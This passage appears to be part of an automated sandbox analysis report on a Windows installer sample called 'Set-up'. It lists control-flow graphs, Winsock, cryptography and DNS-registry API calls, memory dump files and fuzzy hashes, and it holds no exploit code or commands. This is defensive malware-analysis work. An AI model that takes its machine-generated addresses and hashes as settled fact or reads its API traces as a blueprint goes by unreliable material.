d4af1a-d4af1f 1326->1329 1328->1261 1332 d4aee1-d4aeec 1328->1332 1329->1261 1333 d4af02-d4af06 1332->1333 1334 d4aeee-d4aeff 1332->1334 1335 d4af0e-d4af15 1333->1335 1336 d4af08-d4af0b 1333->1336 1334->1333 1335->1251 1336->1335
                                    APIs
                                    • htons.WS2_32(?), ref: 00D4AAE8
                                    • htons.WS2_32(?), ref: 00D4AB33
                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00D4AB9A
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00D4ABE3
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00D4AC02
                                    • setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 00D4AC29
                                    • htonl.WS2_32(00000000), ref: 00D4AC69
                                    • bind.WS2_32(?,00000017,0000001C), ref: 00D4ACCF
                                    • setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 00D4ACFE
                                    • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 00D4AD20
                                    • WSAGetLastError.WS2_32 ref: 00D4ADB5
                                    • closesocket.WS2_32(?), ref: 00D4AE6F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
                                    • String ID:
                                    • API String ID: 4039825230-0
                                    • Opcode ID: a03f16627a6e023131128d40e7e4077325b72fcf2447c7c81014b6e823c5b0ae
                                    • Instruction ID: c70bc1d6a86674d23a764a13133e85b31c783302af263e889042b311511d19fe
                                    • Opcode Fuzzy Hash: a03f16627a6e023131128d40e7e4077325b72fcf2447c7c81014b6e823c5b0ae
                                    • Instruction Fuzzy Hash: 83E1C2746443019FE720CF28D844B6BB7E5FF88314F184A2DF9A98B291E775E944CB62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1338 c8116c-c8118a 1339 c81430-c81439 GetStartupInfoA 1338->1339 1340 c81190-c811a1 1338->1340 1342 c81448-c8145d _cexit 1339->1342 1341 c811bc-c811c8 1340->1341 1343 c811a8-c811aa 1341->1343 1344 c811ca-c811d4 1341->1344 1345 c813d0-c813dd 1343->1345 1346 c811b0-c811b9 Sleep 1343->1346 1347 c811da-c811e1 1344->1347 1348 c813e3-c813f7 call 1008a20 1344->1348 1345->1347 1345->1348 1346->1341 1350 c81460-c81479 _initterm 1347->1350 1351 c811e7-c811f9 1347->1351 1353 c813fd-c8141d _initterm 1348->1353 1354 c811ff-c81201 1348->1354 1357 c81483 1350->1357 1351->1353 1351->1354 1355 c81423-c81429 1353->1355 1356 c81207-c8120e 1353->1356 1354->1355 1354->1356 1355->1356 1358 c8122c-c8126c call 10093e0 SetUnhandledExceptionFilter _set_invalid_parameter_handler call 1009210 __p__acmdln 1356->1358 1359 c81210-c81229 1356->1359 1361 c8148a-c81499 exit 1357->1361 1366 c8126e 1358->1366 1367 c81281-c81287 1358->1367 1359->1358 1368 c812bd-c812c5 1366->1368 1369 c81289-c81294 1367->1369 1370 c81270-c81272 1367->1370 1371 c812db-c812fa malloc 1368->1371 1372 c812c7-c812d0 1368->1372 1375 c8127e 1369->1375 1373 c812b8 1370->1373 1374 c81274-c81277 1370->1374 1371->1357 1378 c81300-c81311 1371->1378 1376 c813c0-c813c4 1372->1376 1377 c812d6 1372->1377 1373->1368 1379 c81279 1374->1379 1380 c812a0-c812a2 1374->1380 1375->1367 1376->1377 1377->1371 1381 c81318-c8134c strlen malloc memcpy 1378->1381 1379->1375 1380->1373 1382 c812a4 1380->1382 1381->1381 1383 c8134e-c81389 call 1009060 call 115bb60 1381->1383 1384 c812a8-c812b1 1382->1384 1389 c8138e-c8139b 1383->1389 1384->1373 1385 c812b3-c812b6 1384->1385 1385->1373 1385->1384 1389->1361 1390 c813a1-c813a9 1389->1390 1390->1342 1391 c813af-c813ba 1390->1391
                                    APIs
                                    • Sleep.KERNEL32 ref: 00C811B7
                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00C81238
                                    • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8124D
                                    • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C81261
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C812EB
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C81323
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C8132E
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C81344
                                    • GetStartupInfoA.KERNEL32 ref: 00C81433
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                                    • String ID:
                                    • API String ID: 3873122205-0
                                    • Opcode ID: 7997f4cf645b04489008d39f3fc2a26baa0104d7069f8fc619efb5d711a562a9
                                    • Instruction ID: 90e3a12e9b708e36c2c2bc74a272f37f5c3f6e8be5e8752293ec8781f12db612
                                    • Opcode Fuzzy Hash: 7997f4cf645b04489008d39f3fc2a26baa0104d7069f8fc619efb5d711a562a9
                                    • Instruction Fuzzy Hash: B481D075904305CFDB24EFA4D0847AEB7E8FB54308F08452DDD998B344DB35A945CB85

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1499 1008e90-1008eb8 _open 1500 1008eba-1008ec7 1499->1500 1501 1008eff-1008f2c call 1009f70 1499->1501 1503 1008ef3-1008efa _exit 1500->1503 1504 1008ec9 1500->1504 1510 1008f39-1008f51 _write 1501->1510 1503->1501 1505 1008ee2-1008ef1 1504->1505 1506 1008ecb-1008ecd 1504->1506 1505->1503 1505->1504 1508 1008ed3-1008ed6 1506->1508 1509 115e6d0-115e6e7 1506->1509 1508->1505 1511 1008ed8 1508->1511 1514 115e6e9 1509->1514 1515 115e6ea-115e71f CryptAcquireContextA 1509->1515 1512 1008f30-1008f37 1510->1512 1513 1008f53-1008f5e _close 1510->1513 1511->1505 1512->1510 1512->1513 1513->1500 1516 115e721-115e72f 1515->1516 1517 115e739-115e75b CryptGenRandom 1515->1517 1520 115e735-115e738 1516->1520 1518 115e766-115e77b CryptReleaseContext 1517->1518 1519 115e75d-115e764 1517->1519 1518->1516 1519->1518 1521 115e77d-115e792 CryptReleaseContext 1519->1521 1521->1520
                                    APIs
                                    • _open.MSVCRT ref: 01008EAD
                                    • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 01008EFA
                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 01008F4A
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 01008F59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _close_exit_open_write
                                    • String ID: terminated$@$CONOUT$
                                    • API String ID: 28676597-491099378
                                    • Opcode ID: c1dccab27d93870d9c351ec80bbb3d3369d7f86bcde6969e39ec36126c7d2f18
                                    • Instruction ID: a297b27d0ee842f54e37486dcf91ad5fcaccccbe6f816c553733f2567c68bbfc
                                    • Opcode Fuzzy Hash: c1dccab27d93870d9c351ec80bbb3d3369d7f86bcde6969e39ec36126c7d2f18
                                    • Instruction Fuzzy Hash: C1414CB4D043058FEB51EF78D44466EBBF4BB48314F408A2EE998D7284E738D545CB56

                                    Control-flow Graph

                                    Strings
                                    • error CryptGenRandom 0x%08lx, xrefs: 011540A9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: error CryptGenRandom 0x%08lx
                                    • API String ID: 0-1222942552
                                    • Opcode ID: 3fc40c6d4fc4d1987ef137e3399e7cca273e2891fd0d0f77c5aecb1ad83306b4
                                    • Instruction ID: 49ba4a239767891b7ca204b6a7afbc8b376d98d5301a41e52a0eca74d1a296e2
                                    • Opcode Fuzzy Hash: 3fc40c6d4fc4d1987ef137e3399e7cca273e2891fd0d0f77c5aecb1ad83306b4
                                    • Instruction Fuzzy Hash: 9A41E2B99093019FD700EF78D18865ABBE4BB88314F458E2EE8D887354EB38D5498F42

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1543 c905b0-c905b7 1544 c905bd-c905d4 1543->1544 1545 c907ee 1543->1545 1546 c905da-c905e6 1544->1546 1547 c907e7-c907ed 1544->1547 1546->1547 1548 c905ec-c905f0 1546->1548 1547->1545 1549 c907c7-c907cc 1548->1549 1550 c905f6-c90620 call c97350 call c870b0 1548->1550 1549->1547 1555 c9066a-c9068c call cbdec0 1550->1555 1556 c90622-c90624 1550->1556 1561 c90692-c906a0 1555->1561 1562 c907d6-c907e3 call c97380 1555->1562 1558 c90630-c90655 call c870d0 call c903c0 call c97450 1556->1558 1589 c9065b-c90668 call c870e0 1558->1589 1590 c907ce 1558->1590 1564 c906a2-c906a4 1561->1564 1565 c906f4-c906f6 1561->1565 1562->1547 1568 c906b0-c906e4 call c973b0 1564->1568 1570 c906fc-c906fe 1565->1570 1571 c907ef-c9082b call c93000 1565->1571 1568->1562 1588 c906ea-c906ee 1568->1588 1576 c9072c-c90754 1570->1576 1582 c90a2f-c90a35 1571->1582 1583 c90831-c90837 1571->1583 1578 c9075f-c9078b getsockopt 1576->1578 1579 c90756-c9075b 1576->1579 1586 c90791-c90796 1578->1586 1587 c90700-c90703 1578->1587 1584 c9075d 1579->1584 1585 c90707-c90719 WSAEventSelect 1579->1585 1591 c90a3c-c90a52 1582->1591 1592 c90a37-c90a3a 1582->1592 1593 c90839-c9084c call c96fa0 1583->1593 1594 c90861-c9087e WSAWaitForMultipleEvents 1583->1594 1595 c90723-c90726 1584->1595 1585->1562 1598 c9071f 1585->1598 1586->1587 1596 c9079c-c907c2 call c876a0 1586->1596 1587->1585 1588->1568 1597 c906f0 1588->1597 1589->1555 1589->1558 1590->1562 1591->1562 1600 c90a58-c90a81 call c92f10 1591->1600 1592->1591 1613 c90a9c-c90aa4 1593->1613 1614 c90852 1593->1614 1603 c90882-c9088d 1594->1603 1595->1571 1595->1576 1596->1587 1597->1565 1598->1595 1600->1562 1617 c90a87-c90a97 call c96df0 1600->1617 1608 c90970-c90975 1603->1608 1609 c90893-c908b1 1603->1609 1610 c90a19-c90a2c WSAResetEvent 1608->1610 1611 c9097b-c90989 call c870b0 1608->1611 1615 c908c8-c908f7 WSAEnumNetworkEvents 1609->1615 1610->1582 1611->1610 1626 c9098f-c9099e 1611->1626 1613->1562 1614->1594 1618 c90854-c9085f 1614->1618 1619 c908f9-c908fb 1615->1619 1620 c908fd-c90925 1615->1620 1617->1562 1618->1603 1623 c90928-c9093f WSAEventSelect 1619->1623 1620->1623 1624 c908b3-c908c2 1623->1624 1625 c90945-c9096b 1623->1625 1624->1608 1624->1615 1625->1624 1628 c909b0-c909c1 call c870d0 1626->1628 1631 c909a0-c909ae call c870e0 1628->1631 1632 c909c3-c909c7 1628->1632 1631->1610 1631->1628 1634 c909e8-c90a03 WSAEnumNetworkEvents 1632->1634 1636 c909d0-c909e6 WSAEventSelect 1634->1636 1637 c90a05-c90a17 1634->1637 1636->1631 1636->1634 1637->1636
                                    APIs
                                    • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00C90711
                                    • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00C90783
                                    • WSAWaitForMultipleEvents.WS2_32(00000001,00C83EBE,00000000,00000000,00000000), ref: 00C9086F
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C908EF
                                    • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C90934
                                    • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C909DC
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C909FB
                                    • WSAResetEvent.WS2_32(8508C483), ref: 00C90A1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
                                    • String ID: multi.c
                                    • API String ID: 3264668090-214371023
                                    • Opcode ID: e7fb5f9b5d43e9eca209cf88cd093f9c6fcb681cf96e21ebcac186419c9819c8
                                    • Instruction ID: 16bf9bf82de044d7ee438dc1f5c0a3b8f0757fc1d69a09f74de5190ae5be4190
                                    • Opcode Fuzzy Hash: e7fb5f9b5d43e9eca209cf88cd093f9c6fcb681cf96e21ebcac186419c9819c8
                                    • Instruction Fuzzy Hash: 18D1E2756083019FEB10DF64C889B6B77E9FF84318F24492CF8A5C2252E774EA54DB92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1735 c96fa0-c96fd2 1736 c96feb-c96ff1 1735->1736 1737 c96fd4-c96fd6 1735->1737 1739 c97324-c97330 1736->1739 1740 c96ff7-c96ff9 1736->1740 1738 c96fe0-c96fe4 1737->1738 1741 c9701b-c97041 1738->1741 1742 c96fe6-c96fe9 1738->1742 1743 c96fff-c97016 Sleep 1740->1743 1744 c97186-c97196 WSASetLastError 1740->1744 1745 c97060-c97074 1741->1745 1742->1736 1742->1738 1743->1739 1744->1739 1746 c97057-c9705a 1745->1746 1747 c97076-c97081 1745->1747 1746->1745 1748 c97172-c97174 1746->1748 1747->1746 1749 c97083-c97089 1747->1749 1752 c9719b-c971a8 1748->1752 1753 c97176-c97184 1748->1753 1750 c9708b-c9708f 1749->1750 1751 c970dc-c970df 1749->1751 1754 c97091 1750->1754 1755 c970b0-c970bd 1750->1755 1756 c9712c-c97132 1751->1756 1757 c970e1-c970e5 1751->1757 1758 c971f1-c9722d call c9d7f0 select 1752->1758 1759 c971aa-c971be 1752->1759 1753->1758 1760 c970a0-c970a7 1754->1760 1763 c970bf-c970ce 1755->1763 1764 c970d5 1755->1764 1756->1746 1761 c97138-c9713c 1756->1761 1765 c97100-c9710d 1757->1765 1766 c970e7 1757->1766 1782 c9730b 1758->1782 1783 c97233-c9723e 1758->1783 1767 c9730d-c97310 1759->1767 1768 c971c4-c971c6 1759->1768 1760->1755 1769 c970a9-c970ac 1760->1769 1770 c9714d-c9715a 1761->1770 1771 c9713e 1761->1771 1763->1764 1764->1751 1775 c9710f-c9711e 1765->1775 1776 c97125 1765->1776 1774 c970f0-c970f7 1766->1774 1767->1739 1773 c97312-c97322 WSAGetLastError 1767->1773 1777 c971cc-c971e6 Sleep 1768->1777 1778 c97331-c97344 WSASetLastError 1768->1778 1769->1760 1780 c970ae 1769->1780 1784 c97050 1770->1784 1785 c97160-c9716d 1770->1785 1781 c97140-c97144 1771->1781 1773->1739 1774->1765 1787 c970f9-c970fc 1774->1787 1775->1776 1776->1756 1777->1739 1779 c971ec 1777->1779 1778->1739 1786 c97346 1778->1786 1779->1773 1780->1755 1781->1770 1788 c97146-c97149 1781->1788 1782->1767 1789 c9725c-c97269 1783->1789 1784->1746 1785->1784 1786->1773 1787->1774 1790 c970fe 1787->1790 1788->1781 1791 c9714b 1788->1791 1792 c9726b-c9727b __WSAFDIsSet 1789->1792 1793 c97253-c97256 1789->1793 1790->1765 1791->1770 1794 c9729a-c972ac __WSAFDIsSet 1792->1794 1795 c9727d-c97287 1792->1795 1793->1739 1793->1789 1798 c972ba-c972c9 __WSAFDIsSet 1794->1798 1799 c972ae-c972b3 1794->1799 1796 c97289 1795->1796 1797 c9728e-c97293 1795->1797 1796->1797 1797->1794 1803 c97295 1797->1803 1801 c972cf-c972f6 1798->1801 1802 c97240 1798->1802 1799->1798 1800 c972b5 1799->1800 1800->1798 1804 c972fc-c97306 1801->1804 1805 c97245-c9724c 1801->1805 1802->1805 1803->1794 1804->1805 1805->1793
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 6edcee8fcd6c53ef0cdbbbd54ccdfb651c7d9b915f6ff91de47d882166efdaf3
                                    • Instruction ID: 18d698ac297509fb3dfddedfe0a01f4af46df81907ae4c2fb65525ad78db91e3
                                    • Opcode Fuzzy Hash: 6edcee8fcd6c53ef0cdbbbd54ccdfb651c7d9b915f6ff91de47d882166efdaf3
                                    • Instruction Fuzzy Hash: 4491063061A7458BDB358B69C8887BB72D9FFC4320F14872CE8A9831D4EB749E50D691
                                    APIs
                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 00D4A90C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: recvfrom
                                    • String ID:
                                    • API String ID: 846543921-0
                                    • Opcode ID: 040b1c47bee8159388f475a13a9cb184d3ffa98b7431ee481b86b762b32694d5
                                    • Instruction ID: e2232d190899aba5d41c7c94ca7da18a35e6186ede2496a873f8e7455a22142a
                                    • Opcode Fuzzy Hash: 040b1c47bee8159388f475a13a9cb184d3ffa98b7431ee481b86b762b32694d5
                                    • Instruction Fuzzy Hash: 6BF06D79108308AFD2209F05EC48DABBBEDEFC9754F05456DF848132118270AE10CE72
                                    APIs
                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A499
                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A4FB
                                    • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A531
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00D3AA19
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3AA4C
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00D3AA97
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00D3AAE9
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00D3AB30
                                    • RegCloseKey.KERNELBASE(?), ref: 00D3AB6A
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00D3AB82
                                    • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3ABAD
